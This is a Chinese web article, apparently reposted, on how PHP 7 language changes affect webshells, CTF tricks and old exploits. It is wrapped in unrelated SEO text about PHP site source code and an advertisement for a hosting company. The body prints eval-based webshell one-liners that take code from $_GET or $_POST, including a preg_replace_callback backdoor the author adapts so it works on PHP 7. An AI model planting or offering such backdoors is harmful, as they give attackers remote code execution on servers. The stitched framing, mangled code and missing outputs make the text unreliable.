各位老铁们,大家好,今天由我来为大家分享idc网站php源码分享,以及php网站源码完整的相关问题知识,希望对大家有所帮助。如果可以帮助到大家,还望关注收藏下本站,您的支持是我们最大的动力,谢谢大家了哈,下面我们开始吧!
前言
之前测试的时候发现很多菜刀的马都不能用了,大马也几乎3/4不能正常在php7运行。网上百度也没有找到太多相关性的文章,就自己总结测试了一下关于安全性上的区别。
函数修改
1.preg_replace()不再支持/e修饰符
<?php\npreg_replace(“/.*/e”,$_GET[“h”],”.”);\n?>\n
利用\\e修饰符执行代码的后门大家也用了不少了,具体看官方的这段描述:
如果设置了这个被弃用的修饰符,preg_replace()在进行了对替换字符串的后向引用替换之后,将替换后的字符串作为php代码评估执行(eval函数方式),并使用执行结果作为实际参与替换的字符串。单引号、双引号、反斜线()和NULL字符在后向引用替换时会被用反斜线转义.
很不幸,在PHP7以上版本不在支持\\e修饰符,同时官方给了我们一个新的函数preg_replace_callback:
这里我们稍微改动一下就可以利用它当我们的后门:
<?php\npreg_replace_callback(“/.*/”,function($a){@eval($a[0]);},$_GET[“h”]);\n?>\n
2.create_function()被废弃
<?php\n$func=create_function(”,$_POST[‘cmd’]);$func();\n?>\n
少了一种可以利用当后门的函数,实际上它是通过执行eval实现的。可有可无。
3.mysql_*系列全员移除
如果你要在PHP7上面用老版本的mysql_*系列函数需要你自己去额外装了,官方不在自带,现在官方推荐的是mysqli或者pdo_mysql。这是否预示着未来SQL注入漏洞在PHP上的大幅减少呢~
去特么的预示,我已经很久没在目标站上挖到过sql注入了,全都是预编译!
4.unserialize()增加一个可选白名单参数
$data=unserialize($serializedObj1,[“allowed_classes”=>true]);\n$data2=unserialize($serializedObj2,[“allowed_classes”=>[“MyClass1″,”MyClass2”]]);\n
其实就是一个白名单,如果反序列数据里面的类名不在这个白名单内,就会报错。
像这样的报错!
可以是类名也可以是布尔数据,如果是FALSE就会将所有的对象都转换为__PHP_Incomplete_Class对象。TRUE是无限制。也可以传入类名实现白名单。
妈的,还好现在是可选不是必选,要是默认FALSE逼程序员弄白名单那就真的吐血了。
5.assert()默认不在可以执行代码
这就是众多马不能用的罪魁祸首了,太多的马用assert()来执行代码了,这个更新基本就团灭,一般情况下修改成eval即可正常运行了~
提一下,菜刀在实现文件管理器的时候用的恰好也是assert函数,这导致菜刀没办法在PHP7上正常运行。
语法修改
1.foreach不再改变内部数组指针
<?php\n$a=array(‘1′,’2′,’3’);\nforeach($aas$k=>&$n){\necho””;\n}\nprint_r($a);\nforeach($aas$k=>$n){\necho””;\n\n}\nprint_r($a);\n
这样的代码在php5中,是这样的执行结果:
因为数组最后一个元素的$value引用在foreach循环之后仍会保留,在第二个循环的时候实际上是对之前的指针不断的赋值。php7中通过值遍历时,操作的值为数组的副本,不在对后续操作进行影响。
这个改动影响了某些cms的洞在PHP7上无法利用了….你知道我指的是哪个洞的。
这个问题在PHP7.0.0以后的版本又被改回去了,只影响这一个版本。
2.8进制字符容错率降低
在php5版本,如果一个八进制字符如果含有无效数字,该无效数字将被静默删节。
<?php\nechooctdec(‘012999999999999’).”\\n”;\nechooctdec(‘012’).”\\n”;\nif(octdec(‘012999999999999’)==octdec(‘012’)){\necho”:)”.”\\n”;\n}\n
比如这样的代码在php5中的执行结果如下:
但是在php7里面会触发一个解析错误。
这个问题同样在PHP7.0.0以后的版本又被改回去了,只影响这一个版本。
3.十六进制字符串不再被认为是数字
这个修改一出,以后CTF套路会少很多啊~
很多骚操作都不能用了~
这个没什么好说的,大家都懂。
<?php\nvar_dump(“0x123″==”291”);\nvar_dump(is_numeric(“0x123”));\nvar_dump(“0xe”+”0x1”);\nvar_dump(substr(“foo”,”0x1″));\n?>\n
以上代码在PHP5运行结果如下:
PHP7运行结果如下:
你以为我要说这个在后续版本被改回去了?不,目前截至最新的PHP7.3版本依然没有改回去的征兆,官方称不会在改了。这个讲道理还是蛮伤的。
4.移除了ASP和scriptPHP标签
现在只有这样的标签能在php7上运行了。
字面意思,影响其实不是很大(只是以后骚套路会少一点)。
5.超大浮点数类型转换截断
将浮点数转换为整数的时候,如果浮点数值太大,导致无法以整数表达的情况下,在PHP5的版本中,转换会直接将整数截断,并不会引发错误。在PHP7中,会报错。
CTF又少一个出题套路,这个问题我只在CTF上见过,影响应该不大。
杂项
exec(),system()passthru()函数对NULL增加了保护.list()不再能解开字符串string变量$HTTP_RAW_POST_DATA被移除__autoload()方法被废弃parse_str()不加第二个参数会直接把字符串导入当前的符号表,如果加了就会转换称一个数组。现在是第二个参数是强行选项了。统一不同平台下的整型长度session_start()可以加入一个数组覆盖php.ini的配置
后记
这篇文章将保持长期更新和修正。但是很遗憾FB在发布之后作者就没有权限更改了,因此后续更新将在博客上发布。
天下数据是国内最大的全球海外IDC服务商,服务器、数据中心、区块链、物联网、安防、CDN、视频直播、直销等行业解决方案发展成熟,各大行业上市企业也热衷于与天下数据合作,省心、省事、省时。到目前为止,天下数据已与全球近120个国家顶级数据中心深度合作,为客户提供不同星级数据中心选择,客户可根据自身业务需求灵活选择!
关于本次idc网站php源码分享和php网站源码完整的问题分享到这里就结束了,如果解决了您的问题,我们非常高兴。